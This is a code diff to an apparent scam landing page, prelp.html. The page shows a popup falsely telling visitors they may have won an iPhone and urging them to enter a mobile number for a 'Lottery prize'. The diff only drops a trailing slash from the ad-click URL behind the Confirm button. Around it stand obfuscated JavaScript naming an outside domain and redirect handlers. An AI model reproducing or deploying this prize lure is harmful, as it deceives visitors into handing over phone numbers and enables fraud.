--- a/pinbox/e20235231703ncash/prelp.html
+++ b/pinbox/e20235231703ncash/prelp.html
@@ -180,7 +180,7 @@ var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.c
 				html: '<strong>You may be a Winner of:</strong> <h2>iphone</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
-				footer: '<a href="https://blast.radadpro.com/click/" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
+				footer: '<a href="https://blast.radadpro.com/click" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
 			});
 		}
 		i = 0;
